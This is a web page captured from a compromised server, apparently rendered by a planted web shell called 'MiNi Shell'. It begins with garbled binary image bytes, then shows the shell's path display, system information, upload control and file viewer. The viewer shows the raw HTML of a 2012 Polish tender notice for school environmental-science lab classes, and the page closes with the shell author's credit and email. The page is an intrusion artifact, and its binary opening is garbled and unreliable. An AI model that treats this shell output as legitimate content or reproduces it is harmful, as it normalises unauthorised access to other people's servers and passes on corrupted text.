JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120522/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120522/113665-N-2012.html

<p class="kh_header"><b>Chrzanów: PRZEPROWADZENIE ZAJĘĆ LABORATORYJNYCH Z OCHRONY ŚRODOWISKA Z ELEMENTAMI METEOROLOGII W ZESPOLE SZKÓŁ EKONOMICZNO-CHEMICZNYCH 
W TRZEBINI W RAMACH REALIZACJI PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO 
W MAŁOPOLSCE.</b><br>
<b>Numer ogłoszenia: 113665 - 2012; data zamieszczenia: 22.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Kształcenia Ustawicznego , ul. F. Focha 3, 32-500 Chrzanów, woj. małopolskie, tel. 32 624 00 18, faks 32 624 00 18.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE ZAJĘĆ LABORATORYJNYCH Z OCHRONY ŚRODOWISKA Z ELEMENTAMI METEOROLOGII W ZESPOLE SZKÓŁ EKONOMICZNO-CHEMICZNYCH 
W TRZEBINI W RAMACH REALIZACJI PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO 
W MAŁOPOLSCE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie zajęć w zakresie zajęć laboratoryjnych z ochrony środowiska z elementami meteorologii oferowane uczniom ZESPOŁU SZKÓŁ EKONOMICZNO-CHEMICZNYCH w TRZEBINI w ramach realizacji projektu MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO W MAŁOPOLSCE. Ilość grup: 2 Ilość uczestników: 20 osób, w tym: -I grupa - 10 osób -II grupa - 10 osób Łączna liczba godzin zajęć: 80 godzin lekcyjnych W tym podział na: I grupa - 40 godzin lekcyjnych 1. Termin realizacji: od 10.09.2012 r. do 30.11.2012 r. -Liczba godzin zajęć: 20 godzin lekcyjnych 2. Termin realizacji: od 07.01.2013 r. do 14.06.2013 r. -Liczba godzin zajęć: 20 godzin lekcyjnych II grupa - 40 godzin lekcyjnych 1. Termin realizacji: od 10.09.2012 r. do 30.11.2012 r. -Liczba godzin zajęć: 20 godzin lekcyjnych 2. Termin realizacji: od 07.01.2013 r. do 14.06.2013 r. -Liczba godzin zajęć: 20 godzin lekcyjnych Termin realizacji: od 10.09.2012 r. do 14.06.2013 r. Program kursu: Zajęcia rozwijające i poszerzające wiedzę z zakresu ochrony wody, powietrza i gleb oraz pomiarów meteorologicznych. Zajęcia przeznaczone dla uczniów kształcących się w zawodzie technik ochrony środowiska przygotowujących się do wejścia na rynek pracy zgodnie z nauczanym zawodem. Zakres tematyczny zajęć wraz z ilością godzin: -Pomiary meteorologiczne, stacje meteorologiczne, wyposażenie ogródka meteorologicznego - 4 godz. -Zapisywanie wyników obserwacji, opracowanie zapisów z przyrządów rejestrujących - 4 godz. -Pomiary opadów atmosferycznych w szkolnym ogródku meteorologicznym - 4 godz. -Pomiary temperatury w szkolnym ogródku meteorologicznym - 4 godz. -Pomiary wilgotności powietrza w szkolnym ogródku meteorologicznym - 4 godz. -Pomiary wiatru w szkolnym ogródku meteorologicznym - 4 godz. -Pomiary ciśnienia atmosferycznego - 4 godz. -Pomiary zachmurzenia - 4 godz. -Pomiary pokrywy śnieżnej - 4 godz. -Analiza map pogody - 4 godz. RAZEM - 40 godz. Zrealizowanie zajęć zgodnie z powyższym zakresem tematycznym pozwoli uczestnikom na rozszerzenie wiedzy i umiejętności koniecznych do dalszej edukacji i podjęcia pracy w jednostkach zajmujących się ochrona środowiska i meteorologią. Miejsce realizacji zajęć: siedziba Zespołu Szkół Ekonomiczno-Chemicznych w Trzebini, ul. Krakowska 12. Szczegółowy harmonogram zajęć zostanie uzgodniony z Liderem szkolnym. Zamawiający zaleca, aby szkolenia planowane były w dni powszednie po lekcjach w godzinach 14.30 do 17.30 oraz w soboty w godzinach 9.00 do 12.00. Zamawiający-Szkoła bezpłatnie udostępni zaplecze lokalowe wraz z dostępem do wybranego sprzętu w salach dydaktycznych znajdujących się 
w siedzibie szkoły. Obowiązki Wykonawcy: a) zabezpieczenie sali z wyposażeniem, przystosowanej do realizacji zajęć, będącego przedmiotem niniejszej umowy; b) opracowanie i przedstawienie szczegółowego harmonogramu realizacji przedmiotu zamówienia, uzgodnionego z Liderem szkolnym, który musi być dostosowany do planu lekcji uczniów. Wszelkie zmiany w harmonogramie należy uzgadniać z Liderem szkolnym. O przesunięciach terminów odbywania zajęć lub braku możliwości przeprowadzenia szkolenia w danym dniu z przyczyn niezależnych, należy jak najszybciej telefoniczne powiadomić Lidera szkolnego oraz Koordynatora projektu, również potwierdzić zaistniały fakt stosownym e-mailem; c) korzystanie z pakietów edukacyjnych z kształtowania kompetencji zawodowych; d) zapewnienie odpowiedniego sprzętu multimedialnego i niezbędnych materiałów dydaktycznych (szkoleniowych) do prawidłowego wykonania przedmiotu umowy tj., notatnik A4 - 25 kartkowe, teczki plastikowe z gumką, skrypty opracowane przez wykładowców - wszystkie materiały, które Wykonawca przekaże uczestnikom zajęć mają być oznaczone logami: Unii Europejskiej, Województwa Małopolskiego, logo projektu, logo powiatu chrzanowskiego. Materiały szkoleniowe po zakończeniu zajęć przejdą na własność uczestników kursu, e) zastosowanie nowoczesnych metod pracy oraz środków dydaktycznych, f) świadczenie usługi objętej przedmiotowym zamówieniem zgodnie z założeniami projektu Modernizacja kształcenia zawodowego w Małopolsce z najwyższą starannością, zgodnie z zasadami współczesnej wiedzy i obowiązującymi przepisami, g) wykonawca zapewnia wykwalifikowanych wykładowców do przeprowadzenia zajęć: -wykształcenie wyższe lub studia podyplomowe z przygotowaniem pedagogicznym uprawniające do nauczania zagadnień związanych z ochroną środowiska w szkole ponadgimnazjalnej zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. (Dz. U. 2009 r. nr 50 poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli; a) informowanie o koniecznych zmianach w treści oraz w formie zajęć, b) kontrolowanie obecności beneficjentów, c) prowadzenie dokumentacji zajęć określonej przez realizatora projektu, d) po zakończeniu kursu przygotowanie i wręczenie uczestnikom zaświadczeń o ukończeniu kursu, wydanych zgodnie z obowiązującymi przepisami, e) informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, f) aktywne uczestniczenie w monitoringu projektu: wypełnianie ankiet oraz zestawień, stosowanie na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo Unii Europejskiej, logo Województwa Małopolskiego, logo projektu, logo powiatu chrzanowskiego. g) oznaczenie sal, w których będą odbywać się zajęcia według wzoru przedstawionego przez Lidera szkolnego. Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. Wykonawca po zakończeniu kursu, w terminie 7 dni wystawi Zamawiającemu fakturę/rachunek oraz dostarczy następującą dokumentację, zatwierdzoną przez przedstawiciela Wykonawcy: a) oryginał dziennika zajęć (wg wzoru określonego przez Zamawiającego), b) oryginalne listy obecności z własnoręcznymi podpisami uczestników zajęć (wg wzoru określonego przez Zamawiającego), c) program zajęć, d) potwierdzenia odbioru materiałów szkoleniowych 
z własnoręcznymi podpisami uczestników zajęć, e) kopie wydanych zaświadczeń/świadectw (za zgodność z oryginałem) oraz listę 
z własnoręcznymi podpisami uczestników, potwierdzającą ich odbiór przez uczestników, f) imienny wykaz osób, które ukończyły i nie ukończyły zajęć, g) dokumentacje fotograficzną z zajęć (min. 5 zdjęć), h) ankiety końcowe (wg wzoru określonego przez Zamawiającego), i) inną dokumentację niezbędną do rozliczenia zajęć, j) informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia/ nie spełnia, w oparciu o oświadczenie dołączone do oferty /załącznik nr 2/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia/ nie spełnia, w oparciu o oświadczenie dołączone do oferty /załącznik nr 2/</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia/ nie spełnia, w oparciu o oświadczenie dołączone do oferty /załącznik nr 2/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą wykształcenie wyższe lub studia podyplomowe z przygotowaniem pedagogicznym uprawniające do nauczania zagadnień związanych z ochroną środowiska w szkole ponadgimnazjalnej zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. (Dz. U. 2009 r. nr 50 poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia/ nie spełnia, w oparciu o oświadczenie dołączone do oferty /załącznik nr 2/ oraz załącznik 5,6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia/ nie spełnia, w oparciu o oświadczenie dołączone do oferty /załącznik nr 2/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez osoby uprawnione lub upoważnione przez Wykonawcę Formularz  ofertowy sporządzony według wzoru stanowiącego Załącznika nr 1.
2. Zaakceptowany i podpisany przez osobę (osoby) upoważnioną (pełnomocnika) do składania 
          oświadczeń woli w imieniu Wykonawcy wzór Umowy /Załącznik nr 4/ - fakultatywnie
3.   Pełnomocnictwo dołączone w formie oryginału lub notarialnie poświadczonej kopii, jeśli oferta
będzie podpisana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie (np. konsorcjum, spółka cywilna).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany opisano w załączniku nr 4 do SIWZ- wzór umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-chrzanowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.powiat-chrzanowski.pl lub można odebrać osobiście w siedzibie Zamawiającego - w Powiatowym Centrum Kształcenia Ustawicznego w Chrzanowie, ul. F. Focha 3, 32-500 Chrzanów - Sekretariat /parter/..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 15:00, miejsce: Oferty należy składać w siedzibie Zamawiającego PCKU, ul. F. Focha 3, 32-500 Chrzanów, sekretariat (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com